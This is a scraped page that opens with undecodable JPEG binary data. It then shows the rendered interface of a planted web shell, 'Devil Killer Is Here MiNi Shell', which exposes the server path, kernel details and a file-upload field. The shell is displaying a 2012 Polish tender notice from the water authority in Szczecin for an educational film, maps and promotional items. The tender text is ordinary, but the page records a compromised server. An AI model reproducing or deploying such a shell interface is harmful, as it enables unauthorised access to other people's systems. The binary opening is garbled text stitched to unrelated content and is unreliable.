JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120110/9577-N-2012.html

<p class="kh_header"><b>Szczecin: Opracowanie i wykonanie materiałów informacyjno-edukacyjnych oraz promocyjnych dla potrzeb zadania: Organizacja i przeprowadzenie działań informacyjnych i promocyjnych wraz z konsultacjami społecznymi projektu Harmonogramu i programu prac oraz projektu Przeglądu istotnych problemów gospodarki wodnej dla obszaru dorzecza w obszarze działania RZGW w Szczecinie.</b><br>
<b>Numer ogłoszenia: 9577 - 2012; data zamieszczenia: 10.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie , ul. Tama Pomorzańska 13A, 70-030 Szczecin, woj. zachodniopomorskie, tel. 091 4411200, faks 091 4411300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.rzgw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i wykonanie materiałów informacyjno-edukacyjnych oraz promocyjnych dla potrzeb zadania: Organizacja i przeprowadzenie działań informacyjnych i promocyjnych wraz z konsultacjami społecznymi projektu Harmonogramu i programu prac oraz projektu Przeglądu istotnych problemów gospodarki wodnej dla obszaru dorzecza w obszarze działania RZGW w Szczecinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opracowanie i wyprodukowanie filmu informacyjno - edukacyjnego 
1)	opracowanie koncepcji merytorycznej filmu,
a.	Opracowanie koncepcji merytorycznej filmu należy oprzeć na aktualnie obowiązujących dokumentacjach planistycznych dotyczących gospodarowania wodami w Polsce, w tym w szczególności: Planie gospodarowania wodami na obszarze dorzecza Odry oraz Programie wodno-środowiskowym kraju, jak również dostępnych opracowaniach i materiałach informacyjnych odnoszących się do przedmiotowej problematyki (udostępni Zamawiający).
b.	Zgodnie z założeniami wstępnymi Zamawiającego, film podzielony powinien być na 9 sekwencji (od 3 do 5 min./sekwencję):
a)	Sekwencja 1. dotyczyć powinna ogólnie planowania gospodarowania wodami zgodnie z Ramową Dyrektywą Wodną (RDW) w odniesieniu do regionów wodnych na obszarze działania RZGW w Szczecinie;
b)	Sekwencje 2 - 8. dotyczyć powinny istotnych problemów gospodarki wodnej (tzn. w sposób obrazowy przedstawiać ich istotę i znaczenie);
c)	Sekwencja 9. dotyczyć powinna procesu konsultacji społecznych dokumentów związanych z aktualizacją planów gospodarowania wodami i samych planów.
d)	Łączny czas trwania filmu: od 30 do 45 minut.
c.	Dla zapewnienia wysokiej jakości merytorycznej filmu, Wykonawca zapewni udział w opracowywaniu przedmiotowej koncepcji specjalistów z zakresu: ochrony środowiska wodnego zgodnej z wymogami prawa unijnego i krajowego, zasobów wód podziemnych, zasobów wód powierzchniowych. Wykonawca zobowiązany jest przedstawić szczegółowe założenia i wstępną koncepcję merytoryczną filmu -  w celu ich pisemnego zaakceptowania przez Zamawiającego - podczas pierwszego spotkania z Zamawiającym, które odbędzie się nie później niż 3 tygodnie po podpisaniu umowy w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca. Zamawiający przekaże swoją decyzję odnośnie przedstawionych przez Wykonawcę przedmiotowych założeń i koncepcji merytorycznej filmu  w terminie 5 dni roboczych po ww. spotkaniu. 
2)	opracowanie scenariuszy i scenopisów poszczególnych sekwencji filmu,
Podstawą tworzenia scenariuszy i scenopisów będzie przyjęta i zaakceptowana pisemnie przez Zamawiającego koncepcja merytoryczna filmu. Zadaniem filmu jest stworzenie poprzez różne techniki wizualizacji, przejrzystego i czytelnego przekazu. Wykonawca zapewni udział w opracowywaniu przedmiotowego zakresu, oprócz specjalistów w dziedzinie filmów telewizyjnych, specjalistów z dziedzin jak w przypadku punktu II.1.1) c. Wstępne scenariusze i scenopisy muszą zostać zaakceptowane pisemnie przez Zamawiającego, po przedstawieniu ich przez Wykonawcę podczas ustalonego przez strony spotkania w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca. Zamawiający przekaże swoją decyzję odnośnie przedstawionych przez Wykonawcę przedmiotowych scenariuszy i scenopisów filmu  w terminie 5 dni roboczych po ww. spotkaniu. 
3)	nagranie materiału filmowego/ujęć w terenie oraz opracowanie animacji komputerowych (w tym również animacja zagadnień, których nie da się zobrazować ujęciami w plenerze), nagranie komentarzy specjalistów/ekspertów omawiających wybrane problemy; 
a.	Nagranie materiału filmowego/ujęć, ustalonych animacji, komentarzy  i całego filmu należy wykonać  w rozdzielczości HD. Nagrania plenerowe dotyczyć będą całego obszaru działania RZGW w Szczecinie. 
b.	Nagrania komentarzy eksperckich (zakłada się osobisty udział eksperta w 2-3 sekwencjach filmu) oraz nagrania lektorskie wykonać należy z zastosowaniem nowoczesnych technik zapewniających studyjną jakość artykulacji i zrozumiałość. 
c.	Koszty nagrań jak wyżej wraz z kosztami wyjazdów w teren pokrywa Wykonawca.
d.	Wykonawca zapewni udział w opracowywaniu przedmiotowego zakresu, specjalistów z dziedzin jak w przypadku punktu II.1.1) c., specjalistów w dziedzinie filmów telewizyjnych oraz   lektora i dźwiękowca. 
e.	W trakcie wykonywanych prac w zakresie nagrania materiału filmowego wraz z komentarzami, Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego   w celu uzgodnienia ewentualnych zmian i pisemnej akceptacji poszczególnych działań.
4)	ostateczny wybór materiału filmowego do montażu,
Ostateczny wybór materiału filmowego do montażu nastąpi z udziałem specjalistów biorących udział w opracowywaniu: koncepcji merytorycznej, scenariuszy i scenopisów oraz upoważnionych przedstawicieli Zamawiającego. Wykonawca zobowiązuje się do pokrycia wszelkich kosztów z tym związanych.
5)	montaż filmu (połączenie poszczególnych ujęć wraz z udźwiękowieniem),
a.	Do montażu filmu Wykonawca  będzie mógł przystąpić po uzyskaniu akceptacji Zamawiającego, dokonanej w ramach ostatecznego wyboru materiału filmowego                               i komentatorskiego. Montaż obejmuje: połączenie wybranych zgodnie z punktem II.1.4. sekwencji wraz z udźwiękowieniem. Wykonawca jest zobowiązany do samodzielnego opracowania tła muzycznego filmu i przekazania Zamawiającemu pełnych praw właścicielskich odnośnie tegoż tła. Wykonawca jest zobowiązany do zapewnienia, dla właściwej realizacji powyższego działania, profesjonalnego studia nagrań. 
b.	W trakcie wykonywanych prac jak wyżej Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego w celu uzgodnienia ewentualnych zmian i pisemnej akceptacji poszczególnych działań. 
6)	kolaudacja filmu,
Odbiór filmu powinien zostać dokonany w siedzibie Zamawiającego, z udziałem   twórców filmu, współpracujących w trakcie jego tworzenia specjalistów oraz przedstawicieli Zamawiającego. Po zakończeniu pokazu Wykonawca zapewni uczestnikom możliwość dyskusji nt. filmu.
7)	Wykonawca musi powielić przygotowany materiał w ilości 1000 szt. na płytach DVD, opracować i wydrukować okładki płyty.
2.	Opracowanie i wykonanie mapy podziału hydrograficznego obszaru działania RZGW w Szczecinie.
Opracowanie i wykonanie mapy obszaru zarządzanego przez RZGW w Szczecinie (region wodny Dolnej Odry i Przymorza Zachodniego oraz region wodny Ücker) w podziale na jednolite części wód powierzchniowych z uwzględnieniem podziału hydrograficznego i administracyjnego. Podkładem do tworzenia przedmiotowej mapy ma być MPHP (komputerowa Mapa Podziału Hydrograficznego Polski) - wersja z października 2007 r. Mapa w formacie AO wykonana musi być w dwóch wersjach, tj. jako mapa składana do formatu A4 oraz jako mapa ścienna. Do Wykonawcy należeć będzie opracowanie redakcyjne mapy, w tym redakcja merytoryczna i techniczna: 
1)	redakcja merytoryczna:
a.	opracowanie szczegółowych założeń oraz wstępnej koncepcji merytorycznej mapy,
b.	pozyskanie materiału merytorycznego potrzebnego do jej wykonania,
c.	pozyskanie minimum 3 specjalistów z dziedziny: planowania gospodarowania wodami, zasobów wód powierzchniowych oraz GIS celem weryfikacji zawartości merytorycznej; 
Wykonawca zobowiązany jest przedstawić szczegółowe założenia i wstępną koncepcję merytoryczną, o których mowa powyżej w celu ich pisemnego zaakceptowania, podczas pierwszego spotkania z Zamawiającym, które odbędzie się nie później niż 1 miesiąc po podpisaniu umowy w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca.  
2)	redakcja techniczna:
a.	opracowanie projektu  graficznego oraz wstępny skład  mapy;
b.	podczas prac redakcyjnych Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego w celu uzgadniania zmian i pisemnej akceptacji poszczególnych etapów realizacji mapy,
c.	wszelkie inne konsultacje odbywać się będą w siedzibie Zamawiającego,
d.	Wykonawca będzie miał 48 godzin na naniesienie poprawek wskazanych przez Zamawiającego,
e.	Wykonawca zobowiązuje się do umożliwienia wyznaczonym pracownikom Zamawiającego obecności podczas wykonywania prac związanych z wydaniem mapy, także pokrycia wszelkich kosztów z tym związanych,
f.	po zakończeniu prac redakcyjnych a przed przystąpieniem do druku Wykonawca przedstawi Zamawiającemu wydruki wstępne (proof) mapy ściennej i składanej, celem pisemnego zaakceptowania ich do druku.
3)	Parametry techniczne mapy składanej: 
a.	format po rozłożeniu: AO, po zlożeniu:A4
b.	ilość stron: 2
c.	falcowanie mapy 9 x 2 szpalty (8 łamów)
d.	papier: kreda błysk, powlekany dwustronnie laminatem
e.	składanie mapy w dowolny sposób 
f.	kolorystyka: 4+4
g.	CMYK
h.	nakład: 1 000 egzemplarzy;
4)	Parametry techniczne mapy ściennej: 
a.	format AO, 
b.	ilość stron: 2
c.	papier: kreda błysk, powlekany dwustronnie laminatem
d.	kolorystyka: 4+4
e.	CMYK
f.	plastikowe listwy do zawieszenia ze sznurkiem,
g.	nakład: 100 egzemplarzy
3.	Opracowanie i wykonanie smyczy promocyjnych
Do Wykonawcy należeć będzie opracowanie redakcyjne smyczy, w tym redakcja merytoryczna i techniczna: 
1)	redakcja merytoryczna:
a.	opracowanie wstępnej koncepcji merytorycznej.
Wykonawca zobowiązany jest przedstawić koncepcję, o której mowa powyżej w celu jej zaakceptowania, podczas pierwszego spotkania z Zamawiającym, które odbędzie się nie później niż 1 miesiąc po podpisaniu umowy w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca.
2)	redakcja techniczna:
a.	opracowanie projektu  graficznego oraz wstępny skład,
b.	podczas prac redakcyjnych Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego w celu uzgadniania zmian i akceptacji poszczególnych etapów realizacji,
c.	wszelkie inne konsultacje odbywać się będą w siedzibie Zamawiającego,
d.	Wykonawca będzie miał 48 godzin na naniesienie poprawek wskazanych przez Zamawiającego,
e.	Wykonawca zobowiązuje się do umożliwienia wyznaczonym pracownikom Zamawiającego obecności podczas wykonywania prac związanych z wykonaniem, także pokrycia wszelkich kosztów z tym związanych,
f.	po zakończeniu prac redakcyjnych a przed przystąpieniem do nadruku Wykonawca przedstawi Zamawiającemu nadruk wstępny celem zaakceptowania do wykonania.
3)	Parametry techniczne: 
a.	Materiał: smycz biodegradowalna
b.	Kolorystyka: 4+0
c.	CMYK
d.	nakład: 1 000 egzemplarzy;
4.	Opracowanie i wykonanie zakładek do książek
Do Wykonawcy należeć będzie opracowanie redakcyjne zakładek, w tym redakcja merytoryczna i techniczna: 
1)	redakcja merytoryczna:
a.	opracowanie wstępnej koncepcji merytorycznej zakładki
Wykonawca zobowiązany jest przedstawić koncepcję, o której mowa powyżej w celu jej  zaakceptowania, podczas pierwszego spotkania z Zamawiającym, które odbędzie się nie później niż 1 miesiąc po podpisaniu umowy w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca.
2)	redakcja techniczna:
a.	opracowanie projektu  graficznego oraz wstępny skład,
b.	podczas prac redakcyjnych Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego w celu uzgadniania zmian i akceptacji poszczególnych etapów realizacji,
c.	wszelkie inne konsultacje odbywać się będą w siedzibie Zamawiającego,
d.	Wykonawca będzie miał 48 godzin na naniesienie poprawek wskazanych przez Zamawiającego,
e.	Wykonawca zobowiązuje się do umożliwienia wyznaczonym pracownikom Zamawiającego obecności podczas wykonywania prac związanych z wykonaniem, także pokrycia wszelkich kosztów z tym związanych,
f.	po zakończeniu prac redakcyjnych a przed przystąpieniem do ostatecznego wydruku Wykonawca przedstawi Zamawiającemu wydruk wstępny (proof) celem zaakceptowania do wykonania.
3)	Parametry techniczne: 
a.	Format: wg wykrojnika
b.	Papier: kreda błysk, powlekany dwustronnie laminatem
c.	Kolorystyka: 4+4
d.	CMYK
e.	nakład: 1 000 egzemplarzy;
5.	Opracowanie i wykonanie teczek z nadrukami RZGW
Do Wykonawcy należeć będzie opracowanie redakcyjne teczek, w tym redakcja merytoryczna i techniczna: 
1)	redakcja merytoryczna:
a.	opracowanie wstępnej koncepcji merytorycznej teczki
Wykonawca zobowiązany jest przedstawić koncepcję, o której mowa powyżej w celu jej  zaakceptowania, podczas pierwszego spotkania z Zamawiającym, które odbędzie się nie później niż 1 miesiąc po podpisaniu umowy w siedzibie Zamawiającego. Koszty związane z udziałem w przedmiotowym spotkaniu ponosi Wykonawca.
2)	redakcja techniczna:
a.	opracowanie projektu  graficznego oraz wstępny skład,
b.	podczas prac redakcyjnych Wykonawca zobowiązuje się do osobistego, bezpośredniego kontaktu w siedzibie Zamawiającego w celu uzgadniania zmian i akceptacji poszczególnych etapów realizacji,
c.	wszelkie inne konsultacje odbywać się będą w siedzibie Zamawiającego,
d.	Wykonawca będzie miał 48 godzin na naniesienie poprawek wskazanych przez Zamawiającego,
e.	Wykonawca zobowiązuje się do umożliwienia wyznaczonym pracownikom Zamawiającego obecności podczas wykonywania prac związanych z wykonaniem, a także pokrycia wszelkich kosztów z tym związanych,
f.	po zakończeniu prac redakcyjnych a przed przystąpieniem do ostatecznego wydruku Wykonawca przedstawi Zamawiającemu wydruk wstępny (proof)  celem zaakceptowania do wykonania.
3)	Parametry techniczne: 
a.	Format: A4
b.	Papier: kreda błysk, powlekany jednostronnie laminatem
c.	Kolorystyka: 4+4
d.	CMYK
e.	nakład: 1 000 egzemplarzy;
6.  Na każdym z wykonanych wyrobów stanowiących przedmiot zamówienia (wydrukach, filmie) oraz na każdej płycie zawierającej ich wersje elektroniczne Wykonawca musi umieścić logo Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej z napisem: Sfinansowano ze środków NFOŚiGW zgodnie z aktualną Instrukcją oznakowania przedsięwzięć finansowanych ze środków Narodowego Funduszu Ochrony Środowiska i  Gospodarki   Wodnej. 
7.  Dla zadania będącego przedmiotem zamówienia  Wykonawca musi opracować Syntezę wykonanych prac, która zawierać powinna w szczególności: przedstawienie celu pracy, opis poszczególnych zadań i ich wyników oraz podsumowanie pracy. Przedmiotową Syntezę Wykonawca musi przekazać Zamawiającemu w ilości: 2 egzemplarze drukowane wraz z zapisem elektronicznym na płycie DVD.
8. Materiały, które Zamawiający udostępni Wykonawcy wyłonionemu w postępowaniu:
  1) Dokumenty planistyczne i opracowania: 
    a. Plan gospodarowania wodami na obszarze dorzecza Odry,
    b. Program wodno-środowiskowy kraju,
    c. Podstawy planowania gospodarowania wodami wg RDW- Informator RZGW Szczecin 2008,
    d. Przegląd istotnych problemów gospodarki wodnej dla obszarów dorzeczy;
  2) Zbiory danych przestrzennych:
    a. Jednolite części wód powierzchniowych w kategorii: rzeki, jeziora, wody przejściowe, wody   
        przybrzeżne według stanu podanego w raporcie planu gospodarowania wodami na obszarze
        dorzecza Odry, 
    b. Jednolite części wód podziemnych według stanu podanego w raporcie planu gospodarowania
        wodami na obszarze dorzecza Odry,
    c. Zlewnie jednolitych części wód powierzchniowych  według stanu podanego w raporcie planu 
        gospodarowania wodami na obszarze dorzecza Odry,
    d. Granica regionu wodnego Dolnej Odry i Przymorza Zachodniego i regionu wodnego Ücker,
    e. Granice podziału administracyjnego (województwa, powiaty, gminy),
    f.  Rastry dla obszaru działania RZGW w Szczecinie (skala 1:200 000);
  3) Mapa Podziału Hydrograficznego Polski (MPHP) - na czas realizacji przedmiotowego zamówienia
      Wykonawcy zostanie udzielona licencja na MPHP i przekazane dane.  
  4) Wszelkie inne dane niezbędne dla realizacji opracowania, a nie będące w posiadaniu Zamawiającego,
       Wnioskodawca musi pozyskać we własnym zakresie i na własny koszt.
9. Warunki przekazania Wykonawcy dokumentów i danych:
1)	  Dokumenty i dane przekazane Wykonawcy przez Zamawiającego mogą być wykorzystywane wyłącznie na potrzeby realizacji niniejszego zamówienia.
2)	   Dokumenty i dane nie mogą być wykorzystane przez Wykonawcę do innych celów niż niniejsze zamówienie.
3)	Dokumenty i dane nie mogą być przekazywane lub udostępnione przez Wykonawcę osobom trzecim. 
4)	Wszelkie dokumenty oraz dane przekazane Wykonawcy przez Zamawiającego, jak również dane zebrane lub opracowane przez Wykonawcę w ramach realizacji niniejszego zamówienia stanowią własność Zamawiającego.
5)	W przypadku otrzymania od Zamawiającego jakichkolwiek danych w wersji elektronicznej Wykonawca zobowiązany jest do usunięcia wszelkich kopii otrzymanych danych z pamięci komputerów i innych nośników magnetycznych i optycznych, oraz zwrotu otrzymanych kopii danych do Zamawiającego. W przypadku otrzymania danych w wersji papierowej Wykonawca zobowiązany jest do ich zniszczenia w sposób uniemożliwiający ich odtworzenie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonuje co najmniej  1 pracę związaną z realizacją telewizyjną dotyczącą ochrony środowiska lub gospodarki wodnej.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie 
potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że  wykonawca  dysponuje  osobami  zdolnymi  do  wykonania zamówienia
   jeżeli wykaże, iż dysponuje co najmniej po jednej osobie na każde wymienione poniżej stanowisko:
   a)  co najmniej 1 osoby posiadającej wykształcenie wyższe oraz staż pracy w instytucjach, których
         działalność związana jest z ochroną środowiska,
   b)	co najmniej 1 osoby posiadającej wykształcenie wyższe z zakresu hydrogeologii oraz
         doświadczenie zawodowe w zakresie realizacji prac studialnych związanych z oceną zasobów
         wód podziemnych,
   c)	co najmniej 1 osoby z doświadczeniem zawodowym w realizacji produkcji telewizyjnych z
         zakresu ochrony środowiska,
   d)	co najmniej 1 osoby ze stażem zawodowym w zakresie grafiki komputerowej; 
         Ocena spełnienia  warunku będzie dokonana na podstawie złożonego przez Wykonawcę
         oświadczenia o posiadaniu uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

